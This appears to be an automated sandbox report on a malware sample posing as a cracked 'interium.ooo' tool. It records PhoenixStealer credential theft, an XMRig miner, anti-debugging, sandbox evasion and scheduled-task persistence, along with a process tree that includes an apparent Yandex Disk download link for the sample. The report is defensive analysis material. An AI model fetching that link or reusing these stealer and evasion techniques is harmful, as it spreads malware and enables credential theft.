Analysis
-
max time kernel
686s -
max time network
637s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
10-02-2022 01:35
Static task
static1
URLScan task
urlscan1
General
Malware Config
Signatures
-
PhoenixStealer
PhoenixStealer is an information stealer written in the C++, it sends the stolen information to cybercriminals.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4588 created 2892 4588 SystemSettings.exe 28 PID 4588 created 2892 4588 SystemSettings.exe 28 PID 4952 created 2892 4952 SystemSettings.exe 28 PID 4952 created 2892 4952 SystemSettings.exe 28 PID 4952 created 2892 4952 SystemSettings.exe 28 -
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil
-
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral1/memory/4260-364-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/4260-366-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Executes dropped EXE 15 IoCs
pid Process 2756 interium.ooo cracked 06.02.2022.exe 3800 installer.exe 3524 45325325354235.exe 4236 services64.exe 2812 sihost64.exe 660 interium.ooo cracked 06.02.2022.exe 3872 installer.exe 4772 45325325354235.exe 5100 services64.exe 1052 sihost64.exe 4516 interium.ooo cracked 06.02.2022.exe 4300 installer.exe 1960 45325325354235.exe 4644 services64.exe 3632 sihost64.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs
pid Process 3800 installer.exe 3524 45325325354235.exe 3800 installer.exe 3800 installer.exe 3800 installer.exe 4236 services64.exe 4236 services64.exe 4772 45325325354235.exe 3872 installer.exe 3872 installer.exe 3872 installer.exe 3872 installer.exe 5100 services64.exe 5100 services64.exe 1960 45325325354235.exe 4300 installer.exe 4300 installer.exe 4300 installer.exe 4300 installer.exe 4644 services64.exe 4644 services64.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4236 set thread context of 4260 4236 services64.exe 140 -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\rescache\_merged\642584412\3373603188.pri SystemSettingsAdminFlows.exe File created C:\Windows\rescache\_merged\4183903823\97717462.pri taskmgr.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettings.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettings.exe File created C:\Windows\rescache\_merged\1742034116\1961760673.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri SystemSettings.exe File created C:\Windows\rescache\_merged\1742034116\1961760673.pri SystemSettings.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettingsAdminFlows.exe File created C:\Windows\rescache\_merged\642584412\3373603188.pri SystemSettingsAdminFlows.exe File created C:\Windows\rescache\_merged\3060194815\1650753000.pri SystemSettingsAdminFlows.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\1253081315.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\1361672858.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 SystemSettings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 SystemSettings.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4160 schtasks.exe 2828 schtasks.exe 1016 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 2 IoCs
pid Process 3984 taskkill.exe 4932 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings control.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 4044 NOTEPAD.EXE 4236 NOTEPAD.EXE 4040 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2480 chrome.exe 2480 chrome.exe 1496 chrome.exe 1496 chrome.exe 3448 chrome.exe 3448 chrome.exe 660 chrome.exe 660 chrome.exe 3436 chrome.exe 3436 chrome.exe 4056 chrome.exe 4056 chrome.exe 3524 45325325354235.exe 3524 45325325354235.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4668 powershell.exe 4668 powershell.exe 4668 powershell.exe 3800 installer.exe 3800 installer.exe 4220 chrome.exe 4220 chrome.exe 4220 chrome.exe 4220 chrome.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4168 chrome.exe 4168 chrome.exe 5056 powershell.exe 5056 powershell.exe 5056 powershell.exe 4236 services64.exe 4732 ILSpy.exe 4732 ILSpy.exe 4732 ILSpy.exe 4732 ILSpy.exe 3476 chrome.exe 3476 chrome.exe 4772 45325325354235.exe 4772 45325325354235.exe 4632 powershell.exe 4632 powershell.exe 4632 powershell.exe 4632 powershell.exe 4544 powershell.exe 4544 powershell.exe 4544 powershell.exe 4544 powershell.exe 3872 installer.exe 3872 installer.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4724 powershell.exe 4724 powershell.exe 4592 taskmgr.exe 4592 taskmgr.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 628 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs
pid Process 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3048 7zG.exe Token: 35 3048 7zG.exe Token: SeSecurityPrivilege 3048 7zG.exe Token: SeSecurityPrivilege 3048 7zG.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe Token: 36 4348 powershell.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeIncreaseQuotaPrivilege 4668 powershell.exe Token: SeSecurityPrivilege 4668 powershell.exe Token: SeTakeOwnershipPrivilege 4668 powershell.exe Token: SeLoadDriverPrivilege 4668 powershell.exe Token: SeSystemProfilePrivilege 4668 powershell.exe Token: SeSystemtimePrivilege 4668 powershell.exe Token: SeProfSingleProcessPrivilege 4668 powershell.exe Token: SeIncBasePriorityPrivilege 4668 powershell.exe Token: SeCreatePagefilePrivilege 4668 powershell.exe Token: SeBackupPrivilege 4668 powershell.exe Token: SeRestorePrivilege 4668 powershell.exe Token: SeShutdownPrivilege 4668 powershell.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeSystemEnvironmentPrivilege 4668 powershell.exe Token: SeRemoteShutdownPrivilege 4668 powershell.exe Token: SeUndockPrivilege 4668 powershell.exe Token: SeManageVolumePrivilege 4668 powershell.exe Token: 33 4668 powershell.exe Token: 34 4668 powershell.exe Token: 35 4668 powershell.exe Token: 36 4668 powershell.exe Token: SeDebugPrivilege 3800 installer.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeIncreaseQuotaPrivilege 4848 powershell.exe Token: SeSecurityPrivilege 4848 powershell.exe Token: SeTakeOwnershipPrivilege 4848 powershell.exe Token: SeLoadDriverPrivilege 4848 powershell.exe Token: SeSystemProfilePrivilege 4848 powershell.exe Token: SeSystemtimePrivilege 4848 powershell.exe Token: SeProfSingleProcessPrivilege 4848 powershell.exe Token: SeIncBasePriorityPrivilege 4848 powershell.exe Token: SeCreatePagefilePrivilege 4848 powershell.exe Token: SeBackupPrivilege 4848 powershell.exe Token: SeRestorePrivilege 4848 powershell.exe Token: SeShutdownPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeSystemEnvironmentPrivilege 4848 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 3048 7zG.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 4732 ILSpy.exe 4732 ILSpy.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 1496 chrome.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe 4592 taskmgr.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3524 45325325354235.exe 4732 ILSpy.exe 4588 SystemSettings.exe 4952 SystemSettings.exe 3928 SystemSettingsAdminFlows.exe 4544 SystemSettingsAdminFlows.exe 4772 45325325354235.exe 1960 45325325354235.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1496 wrote to memory of 1572 1496 chrome.exe 69 PID 1496 wrote to memory of 1572 1496 chrome.exe 69 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2384 1496 chrome.exe 70 PID 1496 wrote to memory of 2480 1496 chrome.exe 71 PID 1496 wrote to memory of 2480 1496 chrome.exe 71 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72 PID 1496 wrote to memory of 2116 1496 chrome.exe 72
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2892
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://disk.yandex.ru/d/Aa7DcDjnhrYs7A2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7fffae574f50,0x7fffae574f60,0x7fffae574f703⤵PID:1572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:23⤵PID:2384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1732 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:2480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 /prefetch:83⤵PID:2116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2856 /prefetch:13⤵PID:3120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2864 /prefetch:13⤵PID:3204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4356 /prefetch:83⤵PID:584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:13⤵PID:2216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:83⤵PID:3772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5944 /prefetch:83⤵PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6084 /prefetch:83⤵PID:1872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=860 /prefetch:83⤵PID:3768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2148 /prefetch:83⤵PID:516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:83⤵PID:3240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6020 /prefetch:83⤵PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:83⤵PID:1904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5468 /prefetch:83⤵PID:3944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5736 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:13⤵PID:3928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:13⤵PID:4044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6376 /prefetch:83⤵PID:1140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6360 /prefetch:83⤵PID:4060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4392 /prefetch:83⤵PID:2888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:83⤵PID:3796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1432,12663686104510919906,12595956413361789477,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4256 /prefetch:83⤵PID:4200
-
-
